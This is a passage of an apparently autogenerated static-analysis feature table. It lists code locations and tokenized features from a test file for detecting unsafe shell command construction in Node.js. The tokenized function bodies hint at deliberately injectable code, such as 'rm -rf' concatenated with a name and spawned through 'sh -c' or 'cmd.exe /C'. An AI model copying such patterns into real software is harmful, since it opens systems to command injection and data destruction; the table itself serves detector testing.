contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:18:165:23 | concat | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:18:165:23 | concat | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:18:165:23 | concat | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:25:165:29 | args2 | CalleeFlexibleAccessPath | ?.concat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:25:165:29 | args2 | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:25:165:29 | args2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:25:165:29 | args2 | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:25:165:29 | args2 | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:25:165:29 | args2 | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:25:165:29 | args2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:3:166:22 | { stdio: 'inherit' } | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:3:166:22 | { stdio: 'inherit' } | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:3:166:22 | { stdio: 'inherit' } | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:3:166:22 | { stdio: 'inherit' } | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:3:166:22 | { stdio: 'inherit' } | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:3:166:22 | { stdio: 'inherit' } | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:3:166:22 | { stdio: 'inherit' } | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:3:166:22 | { stdio: 'inherit' } | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:3:166:22 | { stdio: 'inherit' } | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:5:166:9 | stdio | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:5:166:9 | stdio | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:5:166:9 | stdio | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:5:166:9 | stdio | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:5:166:9 | stdio | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:5:166:20 | stdio: 'inherit' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:5:166:20 | stdio: 'inherit' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:5:166:20 | stdio: 'inherit' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:5:166:20 | stdio: 'inherit' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:5:166:20 | stdio: 'inherit' | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:5:166:20 | stdio: 'inherit' | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:5:166:20 | stdio: 'inherit' | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:5:166:20 | stdio: 'inherit' | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:5:166:20 | stdio: 'inherit' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:5:166:20 | stdio: 'inherit' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:12:166:20 | 'inherit' | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:12:166:20 | 'inherit' | InputAccessPathFromCallee | 2.stdio | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:12:166:20 | 'inherit' | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:12:166:20 | 'inherit' | assignedToPropName | stdio | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:12:166:20 | 'inherit' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:12:166:20 | 'inherit' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:12:166:20 | 'inherit' | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:12:166:20 | 'inherit' | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:12:166:20 | 'inherit' | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:166:12:166:20 | 'inherit' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:1:170:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:1:170:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:1:170:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:1:170:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:1:170:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:1:170:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:1:170:18 | module.exports.cmd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:1:170:18 | module.exports.cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:1:170:18 | module.exports.cmd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:1:175:1 | module. ... T OK\\n\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:1:175:1 | module. ... T OK\\n\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:1:175:1 | module. ... T OK\\n\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:8:170:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:8:170:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:8:170:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:16:170:18 | cmd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:16:170:18 | cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:16:170:18 | cmd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:170:21 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:170:21 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:170:21 | cp | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:170:21 | cp | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:170:21 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:170:21 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:170:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:170:21 | this | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:170:21 | this | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:170:21 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:175:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:175:1 | 'arguments' object of anonymous function | 